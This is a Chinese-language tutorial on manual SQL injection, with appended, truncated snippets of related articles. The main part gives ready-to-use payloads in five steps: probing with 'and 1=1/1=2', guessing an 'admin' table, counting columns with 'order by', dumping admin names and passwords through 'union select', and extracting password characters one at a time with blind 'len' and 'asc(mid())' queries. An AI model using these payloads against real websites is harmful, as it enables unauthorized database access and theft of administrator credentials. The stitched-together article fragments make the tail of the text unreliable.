第一步:判斷環境,尋找注入點
確定注入點:用』報錯就有注入的希望 and 1=1 正常 and 1=2 報錯就基本能注入
第二步:猜解表名檢測是否存在admin表,正確存在,返回錯誤則不存在
and exists (select * from admin)
第三步:猜解字段
order by字段長度猜解資料庫存在多少資料表
order by 1 返回正常
order by 2 返回正常
order by 3 返回錯誤,說明有2個字段
如45正確,46錯誤,則有45個表
and 1=2 union select 1,2,3,4,5,6…,45 from admin 爆出內容 4,8
再猜 賬號密碼
and 1=2 union select 1,2,3,adminname,5,6,7,password,9,10,… from admin
猜出 賬號密碼
and exists (select 字段 from 表名)
and exists (select admin_name from admin)
第四步:字段長度len引數提取欄位的長度()內的admin_name是欄位名,>0可以換成1,2,3…只到猜中欄位的長度
and (select top 1 len(字段) from 表名)>0
and (select top 1 len(admin_name) from admin)>0
如》4正常,>5頁面錯誤 用=5測試正常 說明admin_name的長度是5位
第五步:折半法猜出admin pass內容重要的一環
and (select top 1 asc(mid(字段,1,1))from 表名)>0
and (select top 1 asc(mid(admin_admin,1,1))from admin)>0 猜解第1位
and (select top 1 asc(mid(admin_admin,2,1))from admin)>0 猜解第2位
SQL 手動注入
web安全攻防 學習筆記 1.1 介紹 sql 注入 sql 注入就是指 web 應用程式對使用者輸入資料的合法性沒有判斷,前端傳入後端的引數是攻擊者可控的,並且引數代入資料庫查詢,攻擊者可以通過構造不同的 sql 語句來實現對資料庫任意操作。sql 注入漏洞的產生需要滿足兩個條件 1.2 注入的危...
sql手動注入經驗總結
總結了一下sql幾個注入的基本思路和用法,現來分享一下 如何判斷有無注入 and1 2 步驟 1 找注入點 id 1等等 2 通過order by 找出一共有多少列數。報錯數字前乙個 id 1 order by 3 前面不用加and 3 利用union select 1,2,3 一般用null取代 ...
使用burpsuite進行手動sql注入
sql注入是乙個web安全漏洞,它使攻擊者能夠干擾應用程式對其資料庫的查詢。通常,它使攻擊者可以檢視他們通常無法檢索的資料。成功的sql注入攻擊可能導致未經授權訪問敏感資料,例如密碼,信用卡詳細資訊或個人使用者資訊。1 檢索隱藏的資料,您可以在其中修改sql查詢以返回其他結果。2 顛覆應用程式邏輯,...